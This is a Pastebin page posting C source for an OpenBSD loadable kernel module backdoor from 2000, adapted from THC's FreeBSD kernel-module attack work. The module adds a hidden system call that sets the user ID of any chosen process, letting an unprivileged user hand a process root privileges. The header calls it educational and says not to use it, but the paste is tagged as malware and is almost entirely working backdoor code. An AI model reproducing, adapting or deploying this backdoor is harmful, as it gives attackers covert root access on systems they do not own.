API tools faq
paste
Advertisement
FlyFar

thc_back.c

FlyFar
May 17th, 2024
844
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.12 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. /*
  2.  * Name: OpenBSD backdoor
  3.  * Date: Thu Jun 01 14:46:37 2000
  4.  * Author: pIGpEN [ pigpen@s0ftpj.org, deadhead@sikurezza.org ]
  5.  *
  6.  * idea & credits go to pragmatic / THC
  7.  *               "Attacking FreeBSD with Kernel Modules"
  8.  *
  9.  * OpenBSD porting by   pIGpEN / s0ftpj
  10.  *
  11.  *
  12.  * SoftProject Digital Security for Y2K (www.s0ftpj.org)
  13.  * Sikurezza.org Italian Security MailingList (www.sikurezza.org)
  14.  *
  15.  * COFFEE-WARE LICENSE - This source code is like "THE BEER-WARE LICENSE" by
  16.  * Poul-Henning Kamp <phk@FreeBSD.ORG> but you can give me in return a coffee.
  17.  *
  18.  * Tested on: OpenBSD 2.6 FRACTAL#1 i386
  19.  *
  20.  * This is a simple but useful backdoor for OpenBSD based on a FreeBSD lkm
  21.  * by pragmatic/THC you can read his paper: "Attacking FreeBSD with Kernel
  22.  * Modules" to understand how to implement it also on a OpenBSD kernel...    
  23.  *
  24.  * Greetings to: bozo(iKX), koba (sikurezza.org), pragmatic (THC) for his
  25.  *       work
  26.  *
  27.  * Consider this an example of lkm... don't use it!
  28.  * I didn't cover the module because it must be considered only for
  29.  * educational purposes
  30.  */
  31.  
  32.  
  33. #include <sys/param.h>
  34. #include <sys/systm.h>
  35. #include <sys/syscall.h>
  36. #include <sys/mount.h>
  37. #include <sys/conf.h>
  38. #include <sys/syscallargs.h>
  39. #include <sys/exec.h>
  40. #include <sys/lkm.h>
  41. #include <sys/file.h>
  42. #include <sys/filedesc.h>
  43. #include <sys/errno.h>
  44. #include <sys/proc.h>
  45.  
  46. #define OFFSET  210
  47.  
  48. struct you_make_me_real_args {
  49.     syscallarg(int) p_pid;  /* process to make with p_real uid */
  50.     syscallarg(int) p_real; /* p_real uid */
  51. };
  52.                          
  53. static int
  54. you_make_me_real (struct proc *p, void *v, register_t *retval)
  55. {  
  56.     struct you_make_me_real_args *uap = v;
  57.     struct proc *pr;
  58.  
  59.     if((pr = pfind(SCARG(uap, p_pid))) == NULL)
  60.         return (ESRCH);
  61.    
  62.     pr->p_cred->pc_ucred->cr_uid = SCARG(uap, p_real);
  63.    
  64.     return 0;
  65. }
  66.  
  67. static struct sysent you_make_me_real_sysent = {
  68.     2,
  69.     sizeof(struct you_make_me_real_args),
  70.     you_make_me_real
  71. };
  72.  
  73. MOD_SYSCALL( "thc_bck", OFFSET, &you_make_me_real_sysent);
  74.  
  75. int
  76. thc_bck (struct lkm_table *lkmtp, int cmd, int ver)
  77. {
  78.     DISPATCH(lkmtp, cmd, ver, lkm_nofunc, lkm_nofunc, lkm_nofunc)
  79. }
  80.  
Tags: malware source code Backdoor openbsd
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!